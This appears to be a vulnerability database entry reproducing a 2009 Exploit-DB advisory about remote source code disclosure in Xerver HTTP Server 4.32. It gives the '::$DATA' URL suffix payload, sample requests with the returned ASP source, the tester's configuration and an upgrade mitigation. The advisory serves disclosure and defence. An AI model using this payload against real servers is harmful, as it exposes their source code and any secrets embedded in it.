Xerver HTTP Server v4.32 Remote Arbitrary Source Code Disclosure

vendor:

Xerver HTTP Server

by:

Dr_IDE

9.3

CVSS

HIGH

Remote Arbitrary Source Code Disclosure

200

CWE

Product Name: Xerver HTTP Server

Affected Version From: 4.32

Affected Version To: 4.32

Patch Exists: YES

Related CWE: N/A

CPE: a:xerver:xerver_http_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XPSP3

2009

Xerver HTTP Server v4.32 Remote Arbitrary Source Code Disclosure

Xerver v4.32 is a Windows based HTTP server. This is the latest version of the application available. Xerver v4.32 is vulnerable to remote arbitrary source code disclosure by the following means. An attacker can send a specially crafted HTTP request containing a '::$DATA' string to the vulnerable server in order to view the source code of the requested file. This vulnerability can be exploited remotely.

Mitigation:

Upgrade to the latest version of Xerver HTTP Server.

Source

Exploit-DB raw data:

#################################################################################
#                                                                        	#
# Xerver HTTP Server v4.32 Remote Arbitrary Source Code Disclosure       	#
# Found By:	Dr_IDE				                                #
# Download:	http://www.javascript.nu/xerver                          	#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to remote arbitrary source code disclosure by the
following means.

- Notes -
	1. This is remote only.
	2. Out of the box this server is completely unsecure and wide open,
	my configuration is attached below in case reproduction is an issue.


- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]


- Sample Case 1 -

	http://172.16.2.101/index.html::$DATA

- Remote Browser Output - 

	<html><head></head><body> This is my Web page </body></html>


- Sample Case 2 -

	http://172.16.2.101/default.asp::$DATA

- Remote Browser Output -

	<html>
	<body>
	<%
	response.write("My first ASP script!")
	%>
	</body>
	</html>

- My Server Configuration-

Filename: Xerver2.cfg

----------------------snip-------------------------------------------------------------------------
80
index.html,index.htm,index.shtml,default.html,default.asp,index.php,index.phtml,index.pl,index.cgi
c:\INETPUB\

c:\INETPUB\
php=php,php3=php,php4=php,phtml=php,pl=perl,cgi=perl,exe=,bat=


0
0
0
2
1
XerverWebserver.log
----------------------snip-------------------------------------------------------------------------

# milw0rm.com [2009-09-11]